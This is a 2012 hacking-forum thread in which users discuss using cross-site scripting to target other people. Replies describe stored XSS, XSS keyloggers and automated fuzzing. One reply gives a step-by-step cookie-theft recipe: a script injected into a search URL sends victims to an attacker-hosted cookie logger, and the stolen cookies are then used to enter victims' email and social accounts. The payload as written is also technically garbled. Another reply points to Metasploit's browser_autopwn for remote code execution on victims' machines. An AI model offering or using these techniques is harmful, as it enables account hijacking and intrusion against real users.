Pages: [1]

Author Topic: So XSS how to use it usfully?  (Read 1345 times)

0 Members and 1 Guest are viewing this topic.

Offline relax

  • Sir
  • ***
  • Posts: 562
  • Cookies: 114
  • The one and only
    • View Profile
So XSS how to use it usfully?
« on: August 19, 2012, 12:08:13 am »
okay I rephrase myself.
 I just started  with XSSF and Metasploit and there are a lot of functions that are good but in the victim list I just get myself.

 so correct me if I'm wrong but to get  other people in the list I need to implement my xss code in for example a forum, guest book, a new comment or somewhere where it is saved and executed whenever someone enters the page.

 for if I just implement it in a search function(or in my own url) it only affects me?
trying it in the url is only to test the vulnerability.

 am I right or?
How do you use xss to get for example cookies?

 hope this was a clearer.

ps: sorry for my crappy English
« Last Edit: August 19, 2012, 12:49:22 am by relax »
Report to moderator   Logged

Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
    • View Profile
    • My blog
Re: So XSS how to use it usfully?
« Reply #1 on: August 19, 2012, 12:17:12 am »
what the hell are you trying to explain here?
No punctuation and sucky grammar. Also you use weird terms and abbreviations that I never heard of.
Be a dear and rephrase your post, k?

Sorry for bashing you a bit, but seriously...

P.S. it's not Metaexploit, but Metasploit.
« Last Edit: August 19, 2012, 12:19:39 am by Kulverstukas »
Report to moderator   Logged

Offline EmilKXZ

  • Peasant
  • *
  • Posts: 109
  • Cookies: 10
  • likes monies :p
    • View Profile
    • EmilKXZ
Re: So XSS how to use it usfully?
« Reply #2 on: August 19, 2012, 10:54:57 am »
I have some experience reading posts like this.  :o It can be quite a task, but it's not entirely cryptic, (bad joke coming!) I use "IDA Pro for posters" so I disassembled what he just said. Please use a better english next time, I won't be around forever to help you @relax  :P

XSS Attacks are targetted at the user surfing the web. They essentially attack the browser of the user, not the server that hosts the website. If you want to steal cookies, you'll have to output the cookie into an URL that will "eat it" (accept it as parameter). I won't be telling you how to do this, for this you should do your own research, enough I have done trying to decrypt your post.

You could also attempt to keylog the user, there are XSS-injected Javascript Keyloggers. Do a research on that too.

You could juwst go berserk and fuzz every input of a site and discover which one is not filtered, but is not advisable, there are automated fuzzers for such task. If you don't want to go installing and testing, just get the latest Backtrack and it's pretty straightforward.

Note to advanced users: before you go to flame me because of helping a novice like this, giving it all chewed for him... if it's really into him, he'll succeed. I am a believer that if persons don't have it within them, they are just unable to and it is away from your hands to help him/her. Thanks.
Report to moderator   Logged

Offline relax

  • Sir
  • ***
  • Posts: 562
  • Cookies: 114
  • The one and only
    • View Profile
Re: So XSS how to use it usfully?
« Reply #3 on: August 19, 2012, 04:16:02 pm »
well i have solved the problem :)

my problem was dumb thinking and not understanding the exploit mechanics...

thanks :)
Report to moderator   Logged

ajmal.josh

  • Guest
Re: So XSS how to use it usfully?
« Reply #4 on: August 31, 2012, 12:25:11 pm »
You can use XSS vulnerability to hack cookies from browser. Its a simple way. Create a  cookie logger in free hosting server. Url to cookie logger is www.ajmal.com.in (example) Then find xss vulnerability. You got vulnerability in www.joshi.com.in (example).
Www.joshi.com.in/search.php?q=<script>window.location="www.ajmal.com.in"</script>
On cookie logger there may be a txt file with permission 777. It will save cookie values into that txt file. Then you can hack victim's accounts with cookie. You need to use firefox browser and install cookie manager  to it. Add/Edit cookies with values of victim and open desired page. You can open Email/Social accounts/Forums without the password of victim
Report to moderator   Logged

Z3R0

  • Guest
Re: So XSS how to use it usfully?
« Reply #5 on: August 31, 2012, 07:26:49 pm »
You can also use XSS to trigger client-side exploits, and achieve remote code execution on a victim's machine. XSS is not limited to stealing cookies, and making stupid messages with alert boxes. I don't know why this seems to be such a bizarre concept to comprehend for people in the underground, but pentesters go absolutely ape-shit when they find xss vulnerabilities.

If you're still trying to grasp what I'm talking about, load up the browser_autopwn module in metasploit, and play around with it on your own to understand the basics. Additionally, MaXe from intern0t wrote a PoC a while ago that was cross-posted to the offsec blog, also demonstrating remote code execution being performed by XSS; however, in his PoC, it was the first documented use of XSS to achieve remote code execution without the use of an external exploit. It was solely done with php and javascript.

All of you little noobs really need to start learning how to program, and start looking at some of the exploits being posted from the infosec community, and understand how they work. I'm really sick of the same shit being posted endlessly, year after year. All of the information posted so far has been common knowledge since the 90's!!! *WE* are supposed to be the cutting edge of security research. NOT the infosec community. Stop trying to re-accomplish creating fire from lightning and learn to fucking innovate!
« Last Edit: August 31, 2012, 07:27:53 pm by m0rph »
Report to moderator   Logged
Pages: [1]